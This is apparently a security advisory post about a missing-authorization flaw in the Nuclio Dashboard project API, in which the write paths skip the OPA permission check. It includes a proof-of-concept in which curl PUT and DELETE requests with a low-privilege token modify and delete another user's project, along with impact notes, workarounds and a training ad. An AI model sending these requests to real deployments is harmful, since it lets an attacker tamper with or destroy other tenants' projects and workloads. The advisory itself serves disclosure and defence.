Listen to this Post
The vulnerability (pending CVE) resides in Nuclio Dashboard’s project management API. The dashboard uses OPA (Open Policy Agent) for authorization on read paths, correctly populating `MemberIds` from the authenticated user’s session. However, the write paths (PUT /api/projects/{id} and DELETE /api/projects) construct `PermissionOptions` without setting MemberIds. The platform-layer function `FilterProjectsByPermissions` (pkg/platform/abstract/platform.go:652) short-circuits when `MemberIds` is empty, returning all projects without any OPA check. This allows any authenticated user—even one with zero membership in a target project—to modify or delete any project by name. The deletion cascades to all associated functions, API gateways, and function events. Kubernetes deployments are also affected because projects map to NuclioProject CRDs; modification changes fields like DefaultFunctionNodeSelector, and deletion removes the CRD and all child resources. Validation functions on the write path (ValidateProjectConfig, ValidateDeleteProjectOptions) are format-only and contain no identity or ownership checks. The `ValidateDeleteProjectOptions` function internally calls `GetProjects` with the same empty MemberIds, creating a false security check. The call chain shows that read path correctly invokes OPA, while write paths completely bypass it. The attacker model requires only valid low-privilege credentials; no Kubernetes RBAC permissions are needed. Exploitation difficulty is very low—an attacker sends PUT or DELETE requests with the target project name. The proof of concept compiles the dashboard from source, uses mock auth and OPA servers, and demonstrates a reader token (no project access) successfully modifying and deleting a project created by an admin. The impact is a multi-tenant isolation breach: integrity (modify any project) and availability (delete any project) are high; confidentiality is low due to side-channel existence inference. No patched version exists as of 2026-05-06; workarounds include network restrictions and credential control.
DailyCVE Form:
Platform: Nuclio Dashboard
Version: v1.15.26, HEAD
Vulnerability: Missing Authorization
Severity: Critical
date: 2026-06-04
Prediction: 2026-09-30
What Undercode Say:
Build dashboard from source
cd /path/to/nuclio-source
GOPROXY="https://goproxy.io,direct" go build -o /tmp/nuclio-test/nuclio-dashboard ./cmd/dashboard/main.go
Start mock servers (Python)
python3 mock_server.py &
Start dashboard with iguazio auth
./nuclio-dashboard --platform=local --listen-addr=:8070 \
--auth-config-kind=iguazio \
--auth-config-iguazio-verification-url="http://127.0.0.1:9998/verify"
Unauthorized PUT (exploit)
curl -X PUT -H "Authorization: reader-token" \
-H "x-nuclio-namespace: test-ns" \
-d '{"metadata":{"name":"victim-project"},"spec":{"description":"hacked"}}' \
http://localhost:8070/api/projects/victim-project
Returns 204 (successful modification)
Unauthorized DELETE
curl -X DELETE -H "Authorization: reader-token" \
-H "x-nuclio-namespace: test-ns" \
-d '{"metadata":{"name":"victim-project","namespace":"test-ns"}}' \
http://localhost:8070/api/projects
Returns 204 (successful deletion)
Exploit:
Authenticated low-privilege user sends PUT/DELETE to any known project name. No special skill required. Four-step chain: authenticate, send PUT with modified spec, observe 204, optionally send DELETE. OPA never invoked.
Protection:
Network restriction (firewall/K8s NetworkPolicy) to limit Dashboard access. Strict credential control. Enable audit logging on PUT/DELETE /api/projects paths. No official patch as of 2026-05-06.
Impact:
Multi-tenant isolation breach: any authenticated user modifies/deletes any project. Integrity (H): modify project config, affecting function deployment behavior. Availability (H): cascade deletion of all functions, gateways, events. Confidentiality (L): side-channel project existence leak via response codes.
🎯Let’s Practice Exploiting & Learn Patching For Free:
🎓 Live Courses & Certifications:
Join Undercode Academy for Verified Certifications
🚀 Request a Custom Project:
Secure, high-velocity infrastructure and disruptive technological engineering. Contact our engineering team for high-tier development and proprietary systems:
[email protected]
💎 Smart Architecture | 🛡️ Secure by Design | ⭐ Trusted by Thousands
Sources:
Reported By: nvd.nist.gov
Extra Source Hub:
Undercode
